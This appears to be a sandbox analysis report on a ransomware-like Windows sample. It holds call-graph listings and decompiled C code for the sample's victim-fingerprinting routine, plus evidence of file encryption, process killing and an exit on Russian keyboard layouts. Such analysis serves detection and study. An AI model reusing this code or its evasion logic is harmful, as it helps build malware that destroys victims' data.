SHGetSpecialFolderPathW 2352->2353 2358 fc666f8 2352->2358 2354 fc66712 2353->2354 2355 fc6671f SHGetSpecialFolderPathW 2353->2355 2354->2350 2354->2355 2356 fc6672c 2355->2356 2357 fc66739 SHGetSpecialFolderPathW 2355->2357 2356->2350 2356->2357 2359 fc66746 2357->2359 2360 fc66753 VirtualFree 2357->2360 2358->2350 2358->2353 2359->2350 2359->2360 2360->2332 2362 fc66a90 lstrcmpW 2361->2362 2363 fc66aa6 lstrcmpW 2362->2363 2364 fc66bb2 FindNextFileW 2362->2364 2363->2364 2366 fc66abc lstrcatW lstrlenW 2363->2366 2364->2362 2365 fc66bca FindClose 2364->2365 2365->2335 2367 fc66adf 2366->2367 2367->2364 2368 fc66af4 lstrcmpW 2367->2368 2370 fc66b92 CloseHandle 2367->2370 2373 fc66b81 VirtualFree 2367->2373 2374 fc66b69 lstrlenA 2367->2374 2368->2367 2369 fc66b04 CreateFileW GetFileSize 2368->2369 2369->2370 2371 fc66b31 VirtualAlloc 2369->2371 2370->2365 2370->2367 2371->2367 2372 fc66b46 ReadFile 2371->2372 2372->2367 2372->2373 2373->2367 2390 fc669e0 lstrlenA 2374->2390 2377 fc66c3e 2376->2377 2378 fc66c2c GetLastError 2376->2378 2380 fc66c47 lstrlenW WriteFile 2377->2380 2381 fc66c64 CloseHandle 2377->2381 2379 fc66c70 VirtualFree 2378->2379 2379->2337 2380->2381 2381->2379 2392 fc66850 2382->2392 2384 fc6698a 2389 fc669a7 VirtualFree 2384->2389 2400 fc66790 lstrlenW lstrlenW 2384->2400 2387 fc669a3 2387->2389 2412 fc635e0 GetFileAttributesW SetFileAttributesW 2387->2412 2389->2348 2391 fc669fa 2390->2391 2391->2367 2393 fc66860 2392->2393 2394 fc6686a lstrlenW 2392->2394 2393->2384 2395 fc66890 2394->2395 2396 fc6687e 2394->2396 2395->2384 2396->2395 2397 fc6689b lstrlenW VirtualAlloc wsprintfW 2396->2397 2399 fc668d8 VirtualFree 2397->2399 2399->2384 2401 fc667be lstrcmpiW 2400->2401 2402 fc667ac 2400->2402 2403 fc667d3 2401->2403 2404 fc667dc lstrcmpiW 2401->2404 2402->2401 2403->2387 2404->2403 2405 fc667e8 lstrcmpiW 2404->2405 2405->2403 2406 fc667f4 lstrcmpiW 2405->2406 2406->2403 2407 fc66800 lstrcmpiW 2406->2407 2407->2403 2408 fc6680c lstrcmpiW 2407->2408 2408->2403 2409 fc66818 lstrcmpiW 2408->2409 2409->2403 2410 fc66824 lstrcmpiW 2409->2410 2410->2403 2411 fc66830 lstrcmpiW 2410->2411 2411->2387 2442 fc663d0 2412->2442 2415 fc682a0 9 API calls 2416 fc636a5 2415->2416 2417 fc682a0 9 API calls 2416->2417 2418 fc636b5 VirtualAlloc VirtualAlloc 2417->2418 2444 fc66530 EnterCriticalSection CryptAcquireContextW 2418->2444 2421 fc63757 2424 fc66530 10 API calls 2421->2424 2422 fc6372b MessageBoxA 2423 fc639d8 VirtualFree 2422->2423 2423->2389 2425 fc6376c 2424->2425 2426 fc63773 GetLastError 2425->2426 2427 fc63792 2425->2427 2426->2423 2428 fc637a5 CreateFileW 2427->2428 2429 fc637fc VirtualAlloc VirtualAlloc 2428->2429 2430 fc637cd VirtualFree VirtualFree 2428->2430 2431 fc63835 ReadFile 2429->2431 2430->2423 2432 fc63940 VirtualFree 2431->2432 2441 fc63832 _memmove 2431->2441 2433 fc63992 CloseHandle VirtualFree VirtualFree VirtualFree 2432->2433 2434 fc63958 WriteFile WriteFile WriteFile 2432->2434 2435 fc639d5 2433->2435 2436 fc639c9 MoveFileW 2433->2436 2434->2433 2435->2423 2436->2435 2437 fc63888 VirtualAlloc 2437->2441 2438 fc638a7 VirtualAlloc 2439 fc638e5 VirtualFree SetFilePointer WriteFile 2438->2439 2438->2441 2440 fc63927 VirtualFree 2439->2440 2439->2441 2440->2432 2440->2441 2441->2431 2441->2432 2441->2437 2441->2438 2441->2439 2441->2440 2443 fc63626 VirtualAlloc lstrcpyW lstrcatW 2442->2443 2443->2415 2445 fc6659e CryptImportKey 2444->2445 2446 fc66568 GetLastError 2444->2446 2448 fc66622 CryptReleaseContext LeaveCriticalSection 2445->2448 2449 fc665c3 CryptGetKeyParam CryptEncrypt GetLastError 2445->2449 2447 fc66575 CryptAcquireContextW 2446->2447 2451 fc63724 2446->2451 2450 fc66595 2447->2450 2447->2451 2448->2451 2449->2448 2452 fc6661a 2449->2452 2450->2445 2451->2421 2451->2422 2452->2448 2453 fc690a0 IsProcessorFeaturePresent 2454 fc690c6 2453->2454 2488 fc62c50 2489 fc62cda CreateThread DestroyWindow 2488->2489 2490 fc62c7b 2488->2490 2491 fc62c97 BeginPaint lstrlenW TextOutW EndPaint 2490->2491 2492 fc62c80 DefWindowProcW 2490->2492 2493 fc62d10 SendMessageW ExitThread 2455 fc648a8 2456 fc648b0 lstrcmpiW 2455->2456 2457 fc648bf OpenProcess 2456->2457 2458 fc648a4 2456->2458 2457->2458 2459 fc648d1 TerminateProcess CloseHandle 2457->2459 2458->2456 2460 fc648f4 Process32NextW 2458->2460 2459->2458 2460->2458 2461 fc64907 2460->2461 2462 fc6490b VirtualFree 2461->2462 2463 fc64919 FindCloseChangeNotification 2461->2463 2462->2463 2464 fc66d09 2465 fc66d10 lstrcmpW 2464->2465 2466 fc66db3 FindNextFileW 2465->2466 2467 fc66d2a lstrcmpW 2465->2467 2466->2465 2468 fc66dcb FindClose 2466->2468 2467->2466 2469 fc66d40 lstrcatW 2467->2469 2470 fc66dd4 2468->2470 2471 fc66d53 lstrcatW 2469->2471 2472 fc66d6c 2469->2472 2473 fc66c90 111 API calls 2471->2473 2472->2466 2474 fc66950 69 API calls 2472->2474 2473->2472 2474->2472

                                        Callgraph

                                        • Executed
                                        • Not Executed
                                        • Opacity -> Relevance
                                        • Disassembly available
                                        callgraph 0 Function_0FC68FC4 1 Function_0FC689C0 2 Function_0FC683C0 3 Function_0FC65EC0 47 Function_0FC65EB0 3->47 4 Function_0FC68DCC 5 Function_0FC641D6 33 Function_0FC68090 5->33 82 Function_0FC67C10 5->82 6 Function_0FC64BD5 23 Function_0FC664F0 6->23 7 Function_0FC64CD0 8 Function_0FC62AD0 30 Function_0FC62890 8->30 8->33 64 Function_0FC68150 8->64 66 Function_0FC62960 8->66 9 Function_0FC663D0 10 Function_0FC643E0 89 Function_0FC63B20 10->89 11 Function_0FC669E0 12 Function_0FC63BE0 45 Function_0FC63AA0 12->45 12->89 13 Function_0FC64DE0 13->7 32 Function_0FC68990 13->32 14 Function_0FC633E0 37 Function_0FC63190 14->37 50 Function_0FC632B0 14->50 74 Function_0FC63200 14->74 88 Function_0FC63320 14->88 15 Function_0FC67CE0 16 Function_0FC66DE0 29 Function_0FC66C90 16->29 17 Function_0FC66BE0 18 Function_0FC640E0 24 Function_0FC639F0 18->24 18->33 53 Function_0FC66F40 18->53 57 Function_0FC67140 18->57 18->82 95 Function_0FC67330 18->95 19 Function_0FC635E0 19->1 19->2 19->9 42 Function_0FC682A0 19->42 76 Function_0FC63500 19->76 97 Function_0FC66530 19->97 20 Function_0FC68EE9 21 Function_0FC68DF4 22 Function_0FC634F0 25 Function_0FC64BF0 61 Function_0FC64950 25->61 26 Function_0FC67EF0 26->15 27 Function_0FC646F0 28 Function_0FC65880 28->24 40 Function_0FC654A0 28->40 28->53 28->57 71 Function_0FC65D70 28->71 28->82 83 Function_0FC69010 28->83 86 Function_0FC65E20 28->86 28->95 29->17 29->29 55 Function_0FC66A40 29->55 56 Function_0FC66640 29->56 59 Function_0FC66950 29->59 30->42 94 Function_0FC62830 30->94 96 Function_0FC63030 30->96 31 Function_0FC66390 34 Function_0FC66790 35 Function_0FC66E90 35->15 35->26 36 Function_0FC65190 38 Function_0FC64E90 38->13 54 Function_0FC64C40 38->54 39 Function_0FC68D9D 40->15 40->26 44 Function_0FC653A0 40->44 67 Function_0FC65060 40->67 40->83 84 Function_0FC65210 40->84 41 Function_0FC630A0 62 Function_0FC62F50 41->62 43 Function_0FC690A0 46 Function_0FC648A8 48 Function_0FC672B0 49 Function_0FC662B0 51 Function_0FC664B0 52 Function_0FC68DB9 54->83 55->11 75 Function_0FC68100 55->75 56->33 58 Function_0FC68C48 59->19 59->34 60 Function_0FC66850 59->60 61->9 61->10 61->12 61->18 61->27 61->28 61->31 61->45 72 Function_0FC64600 61->72 73 Function_0FC64000 61->73 87 Function_0FC66420 61->87 90 Function_0FC63E20 61->90 93 Function_0FC62D30 61->93 98 Function_0FC64930 61->98 99 Function_0FC64030 61->99 63 Function_0FC62C50 65 Function_0FC68950 66->64 67->38 68 Function_0FC68D6E 69 Function_0FC68C6C 70 Function_0FC65670 70->24 70->40 70->53 70->57 70->71 70->82 70->83 70->86 70->95 71->83 72->24 72->53 72->57 72->82 72->95 73->23 73->51 73->90 92 Function_0FC61020 76->92 77 Function_0FC67A00 78 Function_0FC64C0B 79 Function_0FC66D09 79->29 79->59 80 Function_0FC62D10 81 Function_0FC67A10 84->14 84->36 84->71 84->83 84->86 85 Function_0FC68C11 87->49 89->83 90->70 91 Function_0FC61C20 93->8 93->41 93->62 95->35 95->48 95->65 95->81 96->62 97->22

                                        Executed Functions

                                        Function 0FC67330 Relevance: 142.2, APIs: 55, Strings: 26, Instructions: 499memorystringregistryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 fc67330-fc67347 1 fc6736e-fc67372 0->1 2 fc67349-fc67368 VirtualAlloc GetUserNameW 0->2 3 fc67396-fc673a0 1->3 4 fc67374-fc67390 VirtualAlloc GetComputerNameW 1->4 2->1 5 fc673f6-fc673fa 3->5 6 fc673a2-fc673b7 VirtualAlloc 3->6 4->3 8 fc67495-fc67499 5->8 9 fc67400-fc6743a VirtualAlloc RegOpenKeyExW 5->9 6->5 7 fc673b9-fc673cf call fc672b0 6->7 16 fc673d4-fc673d6 7->16 13 fc6749f-fc674cd VirtualAlloc * 2 8->13 14 fc67599-fc6759d 8->14 11 fc6747e-fc6748f VirtualFree 9->11 12 fc6743c-fc6745e RegQueryValueExW 9->12 11->8 17 fc67460-fc67467 12->17 18 fc67469 GetLastError 12->18 15 fc674d4-fc67507 wsprintfW RegOpenKeyExW 13->15 19 fc6759f-fc675c8 VirtualAlloc call fc672b0 14->19 20 fc675fb-fc675ff 14->20 21 fc67564-fc67566 15->21 22 fc67509-fc67529 RegQueryValueExW 15->22 23 fc673d8-fc673df 16->23 24 fc673e9-fc673ee 16->24 27 fc6746f-fc6747c RegCloseKey 17->27 18->27 38 fc675cd-fc675cf 19->38 25 fc67601-fc67622 GetNativeSystemInfo VirtualAlloc 20->25 26 fc6766e-fc67672 20->26 35 fc67569-fc6756c 21->35 29 fc67534 GetLastError 22->29 30 fc6752b-fc67532 22->30 23->5 31 fc673e1-fc673e7 23->31 34 fc673f1-fc673f3 wsprintfW 24->34 32 fc67624-fc6762b 25->32 33 fc67663 25->33 36 fc67674-fc67683 call fc67a10 26->36 37 fc6768f-fc67693 26->37 27->8 27->11 41 fc6753a-fc67547 RegCloseKey 29->41 30->41 31->34 32->33 42 fc67647-fc6764c 32->42 43 fc67655-fc6765a 32->43 44 fc67632-fc67641 wsprintfW ExitProcess 32->44 45 fc6764e-fc67653 32->45 46 fc6765c-fc67661 32->46 49 fc67668-fc6766b wsprintfW 33->49 34->5 47 fc67576-fc67593 wsprintfW VirtualFree 35->47 48 fc6756e-fc67570 35->48 56 fc67688-fc6768a 36->56 39 fc677d9 37->39 40 fc67699-fc67727 VirtualAlloc * 2 GetWindowsDirectoryW GetVolumeInformationW call fc672b0 37->40 38->20 51 fc675d1-fc675f8 call fc672b0 wsprintfW 38->51 54 fc677df-fc677e3 39->54 63 fc6775a-fc6779b wsprintfW lstrcatW GetModuleHandleW GetProcAddress 40->63 64 fc67729-fc67755 lstrlenW call fc672b0 40->64 41->21 53 fc67549-fc67559 lstrcmpiW 41->53 42->49 43->49 45->49 46->49 47->14 48->15 48->47 49->26 51->20 53->44 60 fc6755f-fc67562 53->60 61 fc67992-fc67999 54->61 62 fc677e9-fc67839 VirtualAlloc 54->62 56->37 57 fc6768c 56->57 57->37 60->35 66 fc679e0-fc679eb 61->66 67 fc6799b-fc679b7 VirtualAlloc 61->67 65 fc67840-fc6784b 62->65 72 fc6779d-fc677b7 lstrlenW 63->72 73 fc677b9 63->73 64->63 65->65 70 fc6784d-fc6785f 65->70 68 fc679d6 67->68 69 fc679b9-fc679c2 call fc66e90 67->69 68->66 69->66 81 fc679c4-fc679d0 VirtualFree 69->81 76 fc67862-fc6787a GetDriveTypeW 70->76 75 fc677c0-fc677d7 VirtualFree 72->75 73->75 75->54 78 fc67880-fc67883 76->78 79 fc6796d 76->79 78->79 82 fc67889-fc678d0 lstrcatW * 3 GetDiskFreeSpaceW 78->82 83 fc67973-fc6797d 79->83 81->68 84 fc678d6-fc67961 call fc68950 * 2 lstrlenW wsprintfW lstrlenW wsprintfW lstrcatW 82->84 85 fc67963-fc6796b lstrcatW 82->85 83->76 86 fc67983-fc6798d lstrlenW 83->86 84->83 85->79 86->61
                                        C-Code - Quality: 88%
                                        			E0FC67330(DWORD* __ecx, void* __edx) {
				void* _v8;
				void* _v12;
				long _v16;
				long _v20;
				int _v24;
				int _v28;
				intOrPtr _v32;
				short _v36;
				short _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				signed short _v76;
				char _v132;
				void* _t154;
				long _t155;
				WCHAR* _t157;
				short _t158;
				short _t159;
				short _t160;
				signed int _t161;
				signed int _t164;
				signed int _t166;
				int _t178;
				void* _t181;
				signed int _t183;
				signed int _t186;
				WCHAR* _t190;
				void* _t191;
				void* _t199;
				_Unknown_base(*)()* _t204;
				signed int _t211;
				intOrPtr _t216;
				WCHAR* _t218;
				WCHAR* _t220;
				void* _t221;
				void* _t224;
				WCHAR* _t226;
				long _t229;
				int _t230;
				long _t234;
				void* _t238;
				long _t240;
				long _t243;
				WCHAR* _t246;
				void* _t247;
				WCHAR* _t249;
				WCHAR* _t250;
				WCHAR* _t252;
				void* _t256;
				DWORD* _t260;
				short* _t261;
				DWORD* _t266;
				void* _t267;
				signed int _t270;
				void* _t274;
				void* _t276;
				void* _t277;
				DWORD* _t279;
				void* _t280;
				void* _t281;

				_t267 = __edx;
				_t260 = __ecx;
				_t279 = __ecx;
				if( *__ecx != 0) {
					_t252 = VirtualAlloc(0, 0x202, 0x3000, 4); // executed
					_t260 =  &_v24;
					 *(_t279 + 8) = _t252;
					_v24 = 0x100;
					GetUserNameW(_t252, _t260); // executed
				}
				if( *((intOrPtr*)(_t279 + 0xc)) != 0) {
					_v24 = 0x1e;
					_t250 = VirtualAlloc(0, 0x20, 0x3000, 4); // executed
					_t260 =  &_v24;
					 *(_t279 + 0x14) = _t250;
					GetComputerNameW(_t250, _t260);
				}
				if( *((intOrPtr*)(_t279 + 0x18)) == 0) {
					L11:
					if( *(_t279 + 0x30) == 0) {
						L18:
						if( *((intOrPtr*)(_t279 + 0x3c)) == 0) {
							L31:
							if( *((intOrPtr*)(_t279 + 0x48)) != 0) {
								_t220 = VirtualAlloc(0, 0x82, 0x3000, 4); // executed
								_push(_t260);
								 *(_t279 + 0x50) = _t220;
								_t221 = E0FC672B0(_t260, 0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"productName", _t220, 0x80); // executed
								if(_t221 == 0) {
									_push(_t260);
									E0FC672B0(_t260, 0x80000002, L"SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion", L"productName",  *(_t279 + 0x50), 0x80);
									wsprintfW( *(_t279 + 0x50), L"error");
									_t281 = _t281 + 8;
								}
							}
							if( *((intOrPtr*)(_t279 + 0x54)) == 0) {
								L44:
								if( *((intOrPtr*)(_t279 + 0x24)) != 0) {
									_v28 = 0;
									_t216 = E0FC67A10(_t279 + 0x2c,  &_v28); // executed
									if(_t216 == 0) {
										 *((intOrPtr*)(_t279 + 0x24)) = _t216;
									}
								}
								if( *((intOrPtr*)(_t279 + 0x60)) != 0) {
									_t190 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
									 *(_t279 + 0x68) = _t190;
									_t191 = VirtualAlloc(0, 0xe0c, 0x3000, 4); // executed
									_t276 = _t191;
									GetWindowsDirectoryW(_t276, 0x100);
									_t66 = _t276 + 0x600; // 0x600
									_t266 = _t66;
									 *((short*)(_t276 + 6)) = 0;
									_t68 = _t276 + 0x400; // 0x400
									_t69 = _t276 + 0x604; // 0x604
									_t70 = _t276 + 0x608; // 0x608
									_t71 = _t276 + 0x200; // 0x200
									GetVolumeInformationW(_t276, _t71, 0x100, _t266, _t70, _t69, _t68, 0x100); // executed
									_push(_t266);
									_t72 = _t276 + 0x60c; // 0x60c
									_t260 = _t72;
									_t199 = E0FC672B0(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"ProcessorNameString", _t260, 0x80); // executed
									if(_t199 != 0) {
										_t73 = _t276 + 0x60c; // 0x60c
										_t211 = lstrlenW(_t73);
										_t74 = _t276 + 0x60c; // 0x60c
										_t260 = _t74;
										_push(_t260);
										E0FC672B0(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"Identifier", _t260 + _t211 * 2, 0x80); // executed
									}
									wsprintfW( *(_t279 + 0x68), L"%d",  *(_t276 + 0x600));
									_t79 = _t276 + 0x60c; // 0x60c
									_t281 = _t281 + 0xc;
									lstrcatW( *(_t279 + 0x68), _t79);
									_t204 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlComputeCrc32");
									_v28 = _t204;
									if(_t204 == 0) {
										 *(_t279 + 0x6c) = 0;
									} else {
										 *(_t279 + 0x6c) = _v28(0x29a,  *(_t279 + 0x68), lstrlenW( *(_t279 + 0x68)) + _t207);
									}
									 *(_t279 + 0x70) =  *(_t276 + 0x600);
									VirtualFree(_t276, 0, 0x8000); // executed
								}
								if( *((intOrPtr*)(_t279 + 0x74)) == 0) {
									L67:
									if( *(_t279 + 0x80) == 0) {
										L72:
										return 1;
									}
									_t154 = VirtualAlloc(0, 0x81, 0x3000, 4); // executed
									 *(_t279 + 0x84) = _t154;
									if(_t154 == 0) {
										L71:
										 *(_t279 + 0x80) = 0;
										goto L72;
									}
									_push(_t260);
									_t155 = E0FC66E90(_t154); // executed
									if(_t155 != 0) {
										goto L72;
									}
									VirtualFree( *(_t279 + 0x84), _t155, 0x8000); // executed
									goto L71;
								} else {
									_v68 = L"UNKNOWN";
									_v64 = L"NO_ROOT_DIR";
									_v60 = L"REMOVABLE";
									_v56 = L"FIXED";
									_v52 = L"REMOTE";
									_v48 = L"CDROM";
									_v44 = L"RAMDISK";
									_t157 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
									 *(_t279 + 0x7c) = _t157;
									_t261 =  &_v132;
									_t158 = 0x41;
									do {
										 *_t261 = _t158;
										_t261 = _t261 + 2;
										_t158 = _t158 + 1;
									} while (_t158 <= 0x5a);
									_t159 =  *L"?:\\"; // 0x3a003f
									_v40 = _t159;
									_t160 =  *0xfc6f348; // 0x5c
									_v36 = _t160;
									_t161 = 0;
									_v24 = 0;
									do {
										_v40 =  *((intOrPtr*)(_t280 + _t161 * 2 - 0x80));
										_t164 = GetDriveTypeW( &_v40); // executed
										_t270 = _t164;
										if(_t270 > 2 && _t270 != 5) {
											_v36 = 0;
											lstrcatW( *(_t279 + 0x7c),  &_v40);
											_v36 = 0x5c;
											lstrcatW( *(_t279 + 0x7c),  *(_t280 + _t270 * 4 - 0x40));
											lstrcatW( *(_t279 + 0x7c), "_");
											_t178 = GetDiskFreeSpaceW( &_v40,  &_v28,  &_v20,  &_v12,  &_v16); // executed
											if(_t178 == 0) {
												lstrcatW( *(_t279 + 0x7c), L"0,");
												goto L64;
											}
											_v8 = E0FC68950(_v16, 0, _v28 * _v20, 0);
											_t256 = _t267;
											_t181 = E0FC68950(_v12, 0, _v28 * _v20, 0);
											_t274 = _v8;
											_v32 = _t274 - _t181;
											asm("sbb eax, edx");
											_v8 = _t256;
											_t183 = lstrlenW( *(_t279 + 0x7c));
											_push(_t256);
											wsprintfW( &(( *(_t279 + 0x7c))[_t183]), L"%I64u/", _t274);
											_t186 = lstrlenW( *(_t279 + 0x7c));
											_push(_v8);
											wsprintfW( &(( *(_t279 + 0x7c))[_t186]), L"%I64u", _v32);
											_t281 = _t281 + 0x20;
											lstrcatW( *(_t279 + 0x7c), ",");
										}
										_t161 = _v24 + 1;
										_v24 = _t161;
									} while (_t161 < 0x1b);
									_t166 = lstrlenW( *(_t279 + 0x7c));
									_t260 =  *(_t279 + 0x7c);
									 *((short*)(_t260 + _t166 * 2 - 2)) = 0;
									goto L67;
								}
							} else {
								__imp__GetNativeSystemInfo( &_v76); // executed
								_t218 = VirtualAlloc(0, 0x40, 0x3000, 4); // executed
								_t260 = _v76 & 0x0000ffff;
								 *(_t279 + 0x5c) = _t218;
								if(_t260 > 9) {
									L42:
									_push(L"Unknown");
									L43:
									wsprintfW(_t218, ??);
									_t281 = _t281 + 8;
									goto L44;
								}
								_t260 =  *(_t260 + E0FC67A00) & 0x000000ff;
								switch( *((intOrPtr*)(_t260 * 4 +  &M0FC679EC))) {
									case 0:
										_push(L"x86");
										goto L43;
									case 1:
										_push(L"ARM");
										goto L43;
									case 2:
										_push(L"Itanium");
										goto L43;
									case 3:
										_push(L"x64");
										goto L43;
									case 4:
										goto L42;
								}
							}
						}
						_t224 = VirtualAlloc(0, 0x8a, 0x3000, 4); // executed
						_v8 = _t224;
						_v20 = _t224 + 0xe;
						_t226 = VirtualAlloc(0, 4, 0x3000, 4); // executed
						 *(_t279 + 0x44) = _t226;
						_t277 = 1;
						_v24 = 1;
						do {
							wsprintfW(_v8, L"%d", _t277);
							_t281 = _t281 + 0xc;
							_v16 = 0;
							_t277 = _t277 + 1;
							_t229 = RegOpenKeyExW(0x80000001, L"Keyboard Layout\\Preload", 0, 0x20019,  &_v12); // executed
							if(_t229 != 0) {
								L27:
								_t230 = 0;
								_v24 = 0;
								goto L28;
							}
							_v28 = 0x80;
							_t234 = RegQueryValueExW(_v12, _v8, 0, 0, _v20,  &_v28); // executed
							if(_t234 != 0) {
								GetLastError();
							} else {
								_v16 = 1;
							}
							RegCloseKey(_v12); // executed
							if(_v16 == 0) {
								goto L27;
							} else {
								if(lstrcmpiW(_v20, L"00000419") == 0) {
									_t218 = wsprintfW( *(_t279 + 0x44), "1");
									_t281 = _t281 + 8;
									ExitProcess(0);
								}
								_t230 = _v24;
							}
							L28:
						} while (_t277 != 9 && _t230 != 0);
						wsprintfW( *(_t279 + 0x44), "0");
						_t281 = _t281 + 8;
						VirtualFree(_v8, 0, 0x8000); // executed
						goto L31;
					}
					_t238 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
					_v20 = _t238;
					 *(_t279 + 0x38) = _t238;
					_v12 = 0;
					_t240 = RegOpenKeyExW(0x80000001, L"Control Panel\\International", 0, 0x20019,  &_v8); // executed
					if(_t240 != 0) {
						L17:
						 *(_t279 + 0x30) = 0;
						VirtualFree( *(_t279 + 0x38), 0, 0x8000);
						goto L18;
					}
					_v24 = 0x40;
					_t243 = RegQueryValueExW(_v8, L"LocaleName", 0, 0, _v20,  &_v24); // executed
					if(_t243 != 0) {
						GetLastError();
					} else {
						_v12 = 1;
					}
					RegCloseKey(_v8); // executed
					if(_v12 != 0) {
						goto L18;
					} else {
						goto L17;
					}
				} else {
					_t246 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
					 *(_t279 + 0x20) = _t246;
					if(_t246 == 0) {
						goto L11;
					}
					_push(_t260);
					_t247 = E0FC672B0(_t260, 0x80000002, L"SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters", L"Domain", _t246, 0x80); // executed
					if(_t247 == 0) {
						wsprintfW( *(_t279 + 0x20), L"undefined");
						L10:
						_t281 = _t281 + 8;
						goto L11;
					}
					_t249 =  *(_t279 + 0x20);
					if( *_t249 != 0) {
						goto L11;
					}
					wsprintfW(_t249, L"WORKGROUP");
					goto L10;
				}
			}




































































                                        0x0fc67330
                                        0x0fc67330
                                        0x0fc6733b
                                        0x0fc67347
                                        0x0fc67357
                                        0x0fc67359
                                        0x0fc6735c
                                        0x0fc67361
                                        0x0fc67368
                                        0x0fc67368
                                        0x0fc67372
                                        0x0fc6737f
                                        0x0fc67386
                                        0x0fc67388
                                        0x0fc6738b
                                        0x0fc67390
                                        0x0fc67390
                                        0x0fc673a0
                                        0x0fc673f6
                                        0x0fc673fa
                                        0x0fc67495
                                        0x0fc67499
                                        0x0fc67599
                                        0x0fc6759d
                                        0x0fc675ad
                                        0x0fc675af
                                        0x0fc675c5
                                        0x0fc675c8
                                        0x0fc675cf
                                        0x0fc675d1
                                        0x0fc675e9
                                        0x0fc675f6
                                        0x0fc675f8
                                        0x0fc675f8
                                        0x0fc675cf
                                        0x0fc675ff
                                        0x0fc6766e
                                        0x0fc67672
                                        0x0fc67677
                                        0x0fc67683
                                        0x0fc6768a
                                        0x0fc6768c
                                        0x0fc6768c
                                        0x0fc6768a
                                        0x0fc67693
                                        0x0fc676a7
                                        0x0fc676b7
                                        0x0fc676ba
                                        0x0fc676bc
                                        0x0fc676c4
                                        0x0fc676cc
                                        0x0fc676cc
                                        0x0fc676d7
                                        0x0fc676db
                                        0x0fc676e2
                                        0x0fc676e9
                                        0x0fc676f6
                                        0x0fc676fe
                                        0x0fc67704
                                        0x0fc6770a
                                        0x0fc6770a
                                        0x0fc67720
                                        0x0fc67727
                                        0x0fc67729
                                        0x0fc67730
                                        0x0fc67736
                                        0x0fc67736
                                        0x0fc6773c
                                        0x0fc67755
                                        0x0fc67755
                                        0x0fc67768
                                        0x0fc67770
                                        0x0fc67776
                                        0x0fc6777d
                                        0x0fc67790
                                        0x0fc67796
                                        0x0fc6779b
                                        0x0fc677b9
                                        0x0fc6779d
                                        0x0fc677b4
                                        0x0fc677b4
                                        0x0fc677ce
                                        0x0fc677d1
                                        0x0fc677d1
                                        0x0fc677e3
                                        0x0fc67992
                                        0x0fc67999
                                        0x0fc679e2
                                        0x0fc679eb
                                        0x0fc679eb
                                        0x0fc679a9
                                        0x0fc679af
                                        0x0fc679b7
                                        0x0fc679d6
                                        0x0fc679d6
                                        0x00000000
                                        0x0fc679d6
                                        0x0fc679b9
                                        0x0fc679bb
                                        0x0fc679c2
                                        0x00000000
                                        0x00000000
                                        0x0fc679d0
                                        0x00000000
                                        0x0fc677e9
                                        0x0fc677f7
                                        0x0fc677fe
                                        0x0fc67805
                                        0x0fc6780c
                                        0x0fc67813
                                        0x0fc6781a
                                        0x0fc67821
                                        0x0fc67828
                                        0x0fc6782e
                                        0x0fc67831
                                        0x0fc67834
                                        0x0fc67840
                                        0x0fc67840
                                        0x0fc67843
                                        0x0fc67846
                                        0x0fc67847
                                        0x0fc6784d
                                        0x0fc67852
                                        0x0fc67855
                                        0x0fc6785a
                                        0x0fc6785d
                                        0x0fc6785f
                                        0x0fc67862
                                        0x0fc67867
                                        0x0fc6786f
                                        0x0fc67875
                                        0x0fc6787a
                                        0x0fc6788b
                                        0x0fc67896
                                        0x0fc678a4
                                        0x0fc678a8
                                        0x0fc678b2
                                        0x0fc678c8
                                        0x0fc678d0
                                        0x0fc6796b
                                        0x00000000
                                        0x0fc6796b
                                        0x0fc678f2
                                        0x0fc678f5
                                        0x0fc678f7
                                        0x0fc678fc
                                        0x0fc67908
                                        0x0fc6790b
                                        0x0fc6790d
                                        0x0fc67910
                                        0x0fc67919
                                        0x0fc6792a
                                        0x0fc67938
                                        0x0fc6793a
                                        0x0fc6794c
                                        0x0fc67954
                                        0x0fc6795f
                                        0x0fc6795f
                                        0x0fc67976
                                        0x0fc67977
                                        0x0fc6797a
                                        0x0fc67986
                                        0x0fc67988
                                        0x0fc6798d
                                        0x00000000
                                        0x0fc6798d
                                        0x0fc67601
                                        0x0fc67605
                                        0x0fc67616
                                        0x0fc67618
                                        0x0fc6761c
                                        0x0fc67622
                                        0x0fc67663
                                        0x0fc67663
                                        0x0fc67668
                                        0x0fc67669
                                        0x0fc6766b
                                        0x00000000
                                        0x0fc6766b
                                        0x0fc67624
                                        0x0fc6762b
                                        0x00000000
                                        0x0fc6765c
                                        0x00000000
                                        0x00000000
                                        0x0fc6764e
                                        0x00000000
                                        0x00000000
                                        0x0fc67655
                                        0x00000000
                                        0x00000000
                                        0x0fc67647
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc6762b
                                        0x0fc675ff
                                        0x0fc674ad
                                        0x0fc674b6
                                        0x0fc674c0
                                        0x0fc674c3
                                        0x0fc674c5
                                        0x0fc674c8
                                        0x0fc674cd
                                        0x0fc674d4
                                        0x0fc674dd
                                        0x0fc674df
                                        0x0fc674e2
                                        0x0fc674ec
                                        0x0fc674ff
                                        0x0fc67507
                                        0x0fc67564
                                        0x0fc67564
                                        0x0fc67566
                                        0x00000000
                                        0x0fc67566
                                        0x0fc6750c
                                        0x0fc67521
                                        0x0fc67529
                                        0x0fc67534
                                        0x0fc6752b
                                        0x0fc6752b
                                        0x0fc6752b
                                        0x0fc6753d
                                        0x0fc67547
                                        0x00000000
                                        0x0fc67549
                                        0x0fc67559
                                        0x0fc6763a
                                        0x0fc6763c
                                        0x0fc67641
                                        0x0fc67641
                                        0x0fc6755f
                                        0x0fc6755f
                                        0x0fc67569
                                        0x0fc67569
                                        0x0fc6757e
                                        0x0fc67580
                                        0x0fc6758d
                                        0x00000000
                                        0x0fc67593
                                        0x0fc6740e
